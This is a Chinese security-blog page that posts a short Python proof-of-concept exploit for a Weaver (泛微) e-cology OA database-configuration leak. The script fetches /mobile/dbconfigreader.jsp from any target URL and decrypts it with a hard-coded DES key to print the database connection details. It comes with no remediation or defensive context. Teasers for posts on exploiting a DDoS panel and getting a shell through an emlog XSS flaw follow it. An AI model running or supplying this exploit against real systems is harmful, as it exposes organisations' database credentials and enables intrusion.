广告也精彩
# -*- coding:utf-8 -*-
#Author:print("")
import pyDes,requests
import sys
def desdecode(secret_key,s):
    cipherX = pyDes.des('        ')
    cipherX.setKey(secret_key)
    y = cipherX.decrypt(s)
    return y
default_headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
}
def send(url):
    data = requests.get(url='%s/mobile/dbconfigreader.jsp'%url).content
    return (desdecode('1z2x3c4v5b6n', data.strip()))

if __name__ == '__main__':
    url = sys.argv[1]
    print('泛微e-cology OA 数据库配置信息泄漏漏洞')
    print('url--->%s'%url)     print('数据库信息如下----->:%s'%send(url))

泛微OA数据库配置信息泄漏 POC

  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
广告也精彩
情话
  • 本文由 发表于 2020年3月27日15:12:42
  • 除非特殊声明,本站文章均为原创,转载请务必保留本文链接
对某ddos页端更深层次漏洞分析篇+漏洞利用篇 技术园

对某ddos页端更深层次漏洞分析篇+漏洞利用篇

我只负责说一下,怎么修你们自己研究吧! 来自某位不知名的群友说的,具体自测反正我知道有sql注入漏洞,其他未经证实不好说! 我转发一下再说一下我自己观点! 正文 群友原文 首先如图,我们看到这位群友输...
emlog程序xss漏洞后台拿shell以及修复方法 技术园

emlog程序xss漏洞后台拿shell以及修复方法

目前 很多Emlog的模板都已经修复了这个XSS漏洞 一小部分还没修复 所以 今天就利用这个漏洞原理 来拿下一个博客站的后台! 教程开始 首先 检查一下有没有开放注册 如果开放注册的话 就先注册一个账...
广告也精彩
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: